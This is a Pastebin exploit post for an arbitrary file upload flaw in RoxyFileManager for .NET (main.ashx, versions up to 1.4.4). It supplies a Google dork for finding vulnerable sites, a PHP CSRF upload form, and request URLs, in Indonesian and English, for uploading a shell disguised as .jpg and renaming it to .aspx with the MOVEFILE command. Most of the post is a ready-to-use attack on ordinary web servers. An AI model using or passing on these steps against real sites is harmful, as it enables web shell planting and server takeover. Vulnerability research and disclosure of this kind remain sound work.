Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Exploit Title: RoxyFileManager For .NET (main.ashx) - Arbitrary File Upload
- # Google Dork: inurl:/fileman/Uploads
- # Date: 05-06-2019
- # Exploit Author: AkatsuChan - Security Ghost
- # Author Homepage: http://www.akatsuchan.zone.id
- # Vendor Homepage: http://www.roxyfileman.com
- # Software Link: http://www.roxyfileman.com/download
- # Version: 1.4.4 or Older (Maybe Work in 1.4.5)
- # Tested on: Windows 7
- description (indonesian):
- kerentanan terdapat pada file main.ashx, attacker dapat mengupload file menggunakan csrf dan juga dapat memainkn command untuk melihat,mengganti nama,dan memindahkan lokasi file atau dir
- description (english):
- the vulnerability in the main.ashx file, attacker can upload files using CSRF and can also play commands to view, rename, and move the location of the file or dir.
- CSRF :
- <?php
- echo '
- <center>
- <form method="post">
- <select name="array" required>
- <option value="files[]">files []</option>
- </select>
- <input type="text" name="target" size="50" style="width:260px";" placeholder="url http://site.com/bug/vuln.php" style="margin: 5px auto; padding-left: 5px;" required><br>
- <input type="submit" name="kunci" value=" Kunci Sasaran!">
- </form></center>';
- $url = $_POST['target'];
- $pf = $_POST['array'];
- $terkuncyihh = $_POST['kunci'];
- if($terkuncyihh) {
- echo "<center><form method='post'
- target='_blank' action='$url'
- enctype='multipart/form-data'>
- <div class='fileUpload btn btn-primary'>Pilih File<input class='upload' type='file' name='$pf'></div>
- <input class='fileUpload btn btn-primary ' type='submit' name='g' value=' Upload Cok!'></form></center>";
- }
- ?>
- poc (indonesian) :
- Pertama Tambahkan Command " ?a=UPLOAD&d=/[path]/fileman/Uploads " pada main.ashx
- (ex : site.com/konichiwa/fileman/asp_net/main.ashx?a=UPLOAD&d=/konichiwa/fileman/Uploads )
- kemudian salin alamat tersebut lalu paste di csrf lalu klik "kunci" pilih shell kalian lalu upload.
- ( direkomendasikan menggunakan format .jpg terlebih dahulu lalu ikutin tutorial selanjutnya untuk merubahnya kembali ke format .aspx/.asp )
- Jika shell.jpg berhasil di upload, kembali ke main.ashx lalu masukan Command ini :
- " ?a=MOVEFILE&f=/[path]/fileman/Uploads/shell.jpg&n=/[path]/fileman/Uploads/shell.aspx "
- (ex : site.com/konichiwa/fileman/asp_net/main.ashx?a=MOVEFILE&f=/konichiwa/fileman/Uploads/shell.jpg&n=/konichiwa/fileman/Uploads/shell.aspx )
- lalu shell.jpg akan berubah menjadi shell.aspx [ hal ini tidak selalu berhasil ]
- poc (english) :
- First, add command " ?a=UPLOAD&d=/[path]/fileman/Uploads " on main.ashx
- (ex : site.com/konichiwa/fileman/asp_net/main.ashx?a=UPLOAD&d=/konichiwa/fileman/Uploads )
- second, copy that url to csrf,click "kunci" and select your shell and clic "upload"
- ( recomended to use .jpg extension first then follow the next tutorial to change it back to the .aspx / .asp extension )
- if shell.jpg successfully uploaded, back to main.ashx and add this command :
- " ?a=MOVEFILE&f=/[path]/fileman/Uploads/shell.jpg&n=/[path]/fileman/Uploads/shell.aspx "
- (ex : site.com/konichiwa/fileman/asp_net/main.ashx?a=MOVEFILE&f=/konichiwa/fileman/Uploads/shell.jpg&n=/konichiwa/fileman/Uploads/shell.aspx )
- then shell.jpg will change to shell.aspx [ this doesn't always work ]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement